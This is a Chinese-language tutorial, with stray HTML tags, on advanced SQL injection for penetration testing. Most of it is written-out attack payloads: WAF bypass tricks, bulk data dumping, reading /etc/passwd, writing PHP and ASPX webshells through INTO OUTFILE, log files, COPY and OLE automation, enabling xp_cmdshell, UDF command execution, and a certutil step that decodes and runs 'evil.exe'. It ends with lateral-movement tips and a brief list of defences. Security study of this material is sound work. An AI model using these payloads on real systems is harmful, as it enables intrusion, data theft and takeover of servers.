SQL注入高级技巧与实战思路拓展<\/h1>

1. SQL注入常见场景分析<\/h2>

1.1 常见注入点识别<\/h3>

搜索功能注入<\/strong>：<\/p>

开发人员可能直接拼接SQL语句而非使用预编译<\/li>
典型SQL语句示例：
SELECT<\/span> p.*<\/span> FROM<\/span> {<\/span>p}<\/span>_page AS<\/span> p WHERE<\/span> p.[title] like<\/span> N'%用户输入%'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> ORDER BY注入<\/strong>：<\/p> ORDER BY后不能参数化，是常见注入点<\/li> 重点关注sort、orderby等参数<\/li> <\/ul> <\/li> 日期类型参数注入<\/strong>：<\/p> 未强制类型转换的日期参数易产生注入<\/li> 示例： SELECT<\/span> *<\/span> FROM<\/span> wp_posts WHERE<\/span> post_date BETWEEN<\/span> '用户输入'<\/span> AND<\/span> '用户输入'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 其他易忽略点<\/strong>：<\/p> 语言参数(lang=cn)<\/li> LIMIT子句<\/li> 任何未经验证的用户输入参数<\/li> <\/ul> <\/li> <\/ol> 2. WAF绕过技术详解<\/h2> 2.1 WAF检测原理分析<\/h3> 分段测试法<\/strong>：<\/p> 测试select user()<\/code>被拦截<\/li> 修改为selact user()<\/code>测试是否拦截<\/li> 修改为select usar()<\/code>测试是否拦截<\/li> 确定拦截规则(如\/select.*?user\/<\/code>正则)<\/li> <\/ul> <\/li> 绕过技巧<\/strong>：<\/p> 大小写变形：SeLeCt<\/li> 关键字替换：user() → usar()<\/li> 注释插入：sel\/xxx<\/em>\/ect<\/li> 空白字符：s e l e c t<\/li> 编码混淆：%53%45%4C%45%43%54<\/li> <\/ul> <\/li> 高级绕过<\/strong>：<\/p> 利用数据库特性：MySQL内联注释\/*!50000select*\/<\/code><\/li> 利用中间件解析特性：IIS的%解码特性<\/li> 非常规语法：+user()<\/code>(SQL Server)<\/li> <\/ul> <\/li> <\/ol> 3. 高效数据定位技术<\/h2> 3.1 大型数据库快速定位技巧<\/h3> sqlmap搜索功能<\/strong>：<\/p> --search -D 数据库名 # 搜索特定数据库<\/span> <\/span><\/span>--search -T # 搜索表名<\/span> <\/span><\/span>--search -C # 搜索列名<\/span> <\/span><\/span><\/code><\/pre><\/li> 关键字段搜索<\/strong>：<\/p> username\/password\/credential\/admin等敏感字段<\/li> user\/customer\/member等用户相关表<\/li> config\/setting等配置表<\/li> <\/ul> <\/li> 系统表查询<\/strong>：<\/p> MySQL: information_schema<\/li> SQL Server: sysobjects\/syscolumns<\/li> Oracle: all_tables\/all_tab_columns<\/li> <\/ul> <\/li> <\/ol> 4. 大数据表导出技术<\/h2> 4.1 高效数据导出方法<\/h3> MySQL导出<\/strong>：<\/p> mysqldump工具： mysqldump -u用户 -p密码数据库 > backup.sql <\/span><\/span><\/code><\/pre><\/li> 站库分离时上传mysqldump到Web服务器<\/li> <\/ul> <\/li> MSSQL导出<\/strong>：<\/p> 直接导出MDF文件<\/li> osql\/bcp命令导出数据<\/li> 示例： EXEC<\/span> master..xp_cmdshell 'bcp "SELECT * FROM 数据库..表名" queryout c:\data.txt -c -T'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> Oracle导出<\/strong>：<\/p> exp\/expdp工具<\/li> 使用UTL_FILE包导出<\/li> <\/ul> <\/li> <\/ol> 5. 文件读写技术详解<\/h2> 5.1 MySQL文件操作<\/h3> 文件读取<\/strong>：<\/p> load data infile<\/code>\/load data local infile<\/code> LOAD<\/span> DATA<\/span> LOCAL<\/span> INFILE '\/etc\/passwd'<\/span> INTO<\/span> TABLE<\/span> test FIELDS TERMINATED BY<\/span> '\n'<\/span> <\/span><\/span><\/code><\/pre><\/li> 读取MySQL凭据：user.MYD<\/code>文件<\/li> <\/ul> <\/li> 文件写入<\/strong>：<\/p> into outfile<\/code>\/into dumpfile<\/code> SELECT<\/span> '<?php phpinfo();?>'<\/span> INTO<\/span> OUTFILE '\/var\/www\/shell.php'<\/span> <\/span><\/span><\/code><\/pre><\/li> 日志文件写入： SET<\/span> global<\/span> general_log_file=<\/span>'\/var\/www\/shell.php'<\/span>; <\/span><\/span>SET<\/span> global<\/span> general_log=<\/span>on<\/span>; <\/span><\/span>SELECT<\/span> '<?php phpinfo();?>'<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> UDF提权<\/strong>：<\/p> 上传自定义函数库<\/li> 创建函数执行系统命令<\/li> <\/ul> <\/li> <\/ol> 5.2 MSSQL文件操作<\/h3> 目录列举<\/strong>：<\/p> EXEC<\/span> xp_dirtree 'c:\'<\/span>,1<\/span>,1<\/span> <\/span><\/span>EXEC<\/span> xp_subdirs 'c:\'<\/span> <\/span><\/span><\/code><\/pre><\/li> 文件写入<\/strong>：<\/p> xp_cmdshell写入： EXEC<\/span> xp_cmdshell 'echo 1 > c:\1.txt'<\/span> <\/span><\/span><\/code><\/pre><\/li> OLE自动化写入： DECLARE<\/span> @<\/span>o INT, @<\/span>f INT, @<\/span>t INT, @<\/span>ret INT <\/span><\/span>EXEC<\/span> sp_oacreate 'scripting.filesystemobject'<\/span>, @<\/span>o OUT<\/span> <\/span><\/span>EXEC<\/span> sp_oamethod @<\/span>o, 'createtextfile'<\/span>, @<\/span>f OUT<\/span>, 'c:\www\1.aspx'<\/span>, 1<\/span> <\/span><\/span>EXEC<\/span> @<\/span>ret =<\/span> sp_oamethod @<\/span>f, 'writeline'<\/span>, NULL<\/span>, '<%@ Page Language="C#"%>'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 文件读取<\/strong>：<\/p> CREATE<\/span> TABLE<\/span> cmd (a text) <\/span><\/span>BULK INSERT<\/span> cmd FROM<\/span> 'd:\config.aspx'<\/span> WITH<\/span> (FIELDTERMINATOR=<\/span>'\n'<\/span>,ROWTERMINATOR=<\/span>'\n\n'<\/span>) <\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> cmd <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5.3 PostgreSQL文件操作<\/h3> 文件读取<\/strong>：<\/p> CREATE<\/span> TABLE<\/span> temp(t text); <\/span><\/span>COPY<\/span> temp FROM<\/span> '\/etc\/passwd'<\/span>; <\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> temp; <\/span><\/span><\/code><\/pre><\/li> 文件写入<\/strong>：<\/p> COPY<\/span> (SELECT<\/span> '<?php phpinfo();?>'<\/span>) TO<\/span> '\/var\/www\/shell.php'<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6. 命令执行技术<\/h2> 6.1 MySQL命令执行<\/h3> UDF提权<\/strong>：<\/p> 上传lib_mysqludf_sys.so\/.dll<\/li> 创建函数： CREATE<\/span> FUNCTION<\/span> sys_exec RETURNS<\/span> int SONAME 'lib_mysqludf_sys.so'<\/span> <\/span><\/span>SELECT<\/span> sys_exec('id'<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> MOF提权<\/strong>：<\/p> 写入恶意MOF文件到\/etc\/mysql\/<\/code>或C:\Windows\System32\wbem\MOF\<\/code><\/li> 利用Windows Management Instrumentation执行命令<\/li> <\/ul> <\/li> <\/ol> 6.2 MSSQL命令执行<\/h3> xp_cmdshell<\/strong>：<\/p> EXEC<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>; RECONFIGURE; <\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>, 1<\/span>; RECONFIGURE; <\/span><\/span>EXEC<\/span> xp_cmdshell 'whoami'<\/span>; <\/span><\/span><\/code><\/pre><\/li> OLE自动化<\/strong>：<\/p> DECLARE<\/span> @<\/span>r INT <\/span><\/span>EXEC<\/span> sp_oacreate 'wscript.shell'<\/span>, @<\/span>r OUT<\/span> <\/span><\/span>EXEC<\/span> sp_oamethod @<\/span>r, 'run'<\/span>, NULL<\/span>, 'cmd \/c whoami > c:\out.txt'<\/span> <\/span><\/span><\/code><\/pre><\/li> CLR集成<\/strong>：<\/p> 上传恶意.NET程序集<\/li> 创建CLR存储过程执行命令<\/li> <\/ul> <\/li> 特殊技巧<\/strong>：<\/p> 证书转Base64写入： EXEC<\/span> xp_cmdshell 'echo BASE64编码 > c:\temp.txt'<\/span> <\/span><\/span>EXEC<\/span> xp_cmdshell 'certutil -decode c:\temp.txt c:\evil.exe'<\/span> <\/span><\/span>EXEC<\/span> xp_cmdshell 'c:\evil.exe'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 7. 注入拓展利用场景<\/h2> 配合文件上传<\/strong>：<\/p> 通过注入查询文件存储路径<\/li> 结合sqlmap的--sql-shell<\/code>定位上传文件<\/li> <\/ul> <\/li> 站库分离利用<\/strong>：<\/p> 数据库服务器无Web时：写入DNS马<\/li> 写入启动项<\/li> DLL劫持<\/li> <\/ul> <\/li> <\/ul> <\/li> 横向移动<\/strong>：<\/p> 读取数据库连接配置<\/li> 获取其他系统凭据<\/li> 通过数据库服务器跳板内网<\/li> <\/ul> <\/li> <\/ol> 8. 防御建议<\/h2> 开发层面<\/strong>：<\/p> 所有SQL查询使用参数化查询<\/li> 避免动态拼接SQL语句<\/li> 对ORDER BY等不可参数化部分严格过滤<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 数据库账户最小权限原则<\/li> 禁用不必要的存储过程(xp_cmdshell等)<\/li> 限制文件读写权限<\/li> <\/ul> <\/li> 防护措施<\/strong>：<\/p> 部署WAF并定期更新规则<\/li> 启用数据库审计日志<\/li> 定期安全扫描与渗透测试<\/li> <\/ul> <\/li> <\/ol> 9. 总结<\/h2> SQL注入不仅是简单的数据查询漏洞，通过深入利用可以实现：<\/p> 敏感数据窃取<\/li> 文件系统读写<\/li> 系统命令执行<\/li> 内网横向移动<\/li> <\/ul> 渗透测试中应重点关注：<\/p> 所有用户输入点的测试<\/li> WAF规则的探测与绕过<\/li> 数据库权限的利用与提升<\/li> 由注入点到整个系统的控制链构建<\/li> <\/ol> 防御方则应建立纵深防御体系，从代码层、数据库层、网络层等多维度防护SQL注入风险。<\/p>